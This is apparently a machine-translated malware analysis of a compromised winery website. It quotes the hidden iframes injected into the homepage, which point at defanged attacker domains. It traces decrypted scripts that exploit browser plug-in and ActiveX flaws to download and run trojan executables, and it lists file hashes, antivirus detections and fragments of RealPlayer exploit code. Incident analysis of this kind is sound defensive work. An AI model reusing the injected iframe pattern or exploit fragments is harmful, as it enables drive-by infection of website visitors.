A god wine company in Bama is infected with worm. win32.downloader/Trojan. win32.mnless.
EndurerOriginal
1Version
Check the homepage code and find that the code is added multiple times:
/---
<Ifame src = hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 075 width = 1 name = '000000' Height = 1> </iframe>
<Ifame src = hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 013 width = 1 Height = 1> </iframe>
<Ifame src = hxxp: // www. f ** oafa ** U. info/ms30.htm? 823 width = 1 name = '000000' Height = 1> </iframe> <ifame src = hxxp: // A **. ll * sging **. COM/ww/new05.htm? 075 width = 1 name = '000000' Height = 1> </iframe>
---/
Hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 075 contains code:
/---
<Ifame src = hxxp: // A ** A. ll * sging **. com/AA/haha.htm width = 5 Height = 5> </iframe>
<Ifame src = hxxp: // A ** A. ll * sging **. com/AA/gege.htm width = 5 Height = 5> </iframe>
---/
Hxxp: // A ** A. ll * sging **. com/ww/new05.htm? 013 and hxxp: // A ** A. ll * sging **. com/ww/new05.htm? Same as 075.
Hxxp: // A ** A. ll * sging **. com/AA/haha.htm is decrypted twice to obtain the original code. The function is to check the cookie variable OK and output the Code:
/---
<SCRIPT src = hxxp: // AA. ll * sging **. com/AA/11.js> </SCRIPT>
<SCRIPT src = hxxp: // AA. ll * sging **. com/AA/BB. js> </SCRIPT>
<Ifame width = '10' Height = '10' src = 'hxxp: // A **. ll * sging **. COM/AA/bf.html '> </iframe>
---/
Use the storm video vulnerability and baidubar. tool to download hxxp: // down. ll * sging **. com/BB/Bd. Cab
File Description: D:/test/Bd. Cab
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:45:22
Modification time: 23:45:30
Access time:
Size: 34045 bytes, 33.253 KB
MD5: 67e8a38e7570de02ec1e3b0fec7ac9d9
Sha1: 9ef39949c850cfe8c03f76fa0dfc7ec3bd286254
CRC32: 888380b0
File Description: D:/test/bd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 34837 bytes, 34.21 KB
MD5: 865188f4f8583f4c0728553b04375261
Sha1: bf3b97ae81f49caf96268ef4cff5b96c18eb88
CRC32: deed8b5c
Kaspersky reportsWorm. win32.downloader. Bi
RisingTrojan. win32.mnless. znc nspack
Hxxp: // A **. ll * sging **. COM/AA/11.js is decrypted once to obtain the original code. The function is to download hxxp: // down. ll * sging **. COM/BB/014.exe, Save As ntuser.com, and run.
File Description: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:42:45
Modification time: 23:42:46
Access time:
Size: 34854 bytes, 34.38 KB
MD5: 19a5e9859be41540446fd3d7b6533d23
Sha1: 5b3a4028a4e85422acaa3f7f974ecbb5d35e936b
CRC32: 57901cec
Kaspersky reports worm. win32.downloader. BD
Rising Star: Backdoor. win32.agent. Yos nspack
Hxxp: // A ** A. ll * sging **. com/AA/BB. JS is the code used to exploit storm audio and video vulnerabilities.
Hxxp: // A ** A. ll * sging **. com/AA/PPP. js uses the PPStream vulnerability code.
Hxxp: // A ** A. ll * sging **. com/AA/bf.html is
Code for the stack overflow vulnerability of the lianzhong connectandenterroom ActiveX control.
Refer:
Lianzhong connectandenterroom ActiveX Control Stack Overflow Vulnerability
Http://www.nsfocus.net/vulndb/11122
Hxxp: // A ** A. ll * sging **. com/AA/gege.htm decrypted twice to obtain the original code. The code used for the RealPlayer vulnerability is interesting:
/---
Payload + = "yuange"; real. Import ("C: \ Program Files \ netmeeting \ testsnd.wav", payload, "",)}; realexploit ();)
---/
Hxxp: // www. f ** oafa ** U. info/ms30.htm? 823 contains code
/---
<HTML>
<Ifame src = "88/881. htm" width = "20" Height = "0" frameborder = "0"> </iframe>
<Ifame src = "88/883. htm" width = "1" Height = "1" frameborder = "0"> </iframe>
</Html>
---/
Hxxp: // www. f ** oafa ** U. info/88/881 .htm utilizing MS06-014: msadco. download hxxp: // www. * 6 * 8y ** u *. CN/68down.exe, save as C:/Microsoft. PIF, by creating the file C:/Microsoft. vbs to start. The variable named qq784378237 in the code
File Description: D:/test/68down.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 31876 bytes, 31.132 KB
MD5: 7f29c1dbaae355933130030aed699672
Sha1: 1a5ede06b6ccd19bb7fb9af3e9b0456e847bfdd0
CRC32: 2738d5ad
Kaspersky reports worm. win32.downloader. CG
The rising news is Trojan. win32.mnless. zyt.
Hxxp: // www. f ** oafa ** U. info/88/883 .htm is decrypted twice to obtain the original code, which is also used by the RealPlayer vulnerability. The last code is different from the above Code:
/---
Payload + = "chuizi ";
Real. Import ("C :\\ Program Files \ netmeeting \ testsnd.wav", payload, "", 0, 0 );
}
Realexploit ();)
---/